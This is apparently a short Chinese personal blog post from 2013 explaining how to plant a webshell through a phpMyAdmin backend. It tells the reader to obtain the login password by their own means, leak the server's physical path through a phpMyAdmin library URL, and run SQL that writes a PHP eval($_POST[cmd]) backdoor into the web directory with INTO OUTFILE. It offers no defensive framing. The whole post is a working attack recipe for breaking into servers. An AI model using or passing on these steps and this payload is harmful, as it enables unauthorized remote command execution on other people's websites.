wenson小庄

导航

phpMyAdmin 后台拿webshell

1.如何拿到登陆密码. 自己想办法 
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.

----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile 'x:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---

4.如果没什么意外.对应网站得到webshell 

 

posted on 2013-09-22 14:56  小庄1  阅读(378)  评论(0编辑  收藏  举报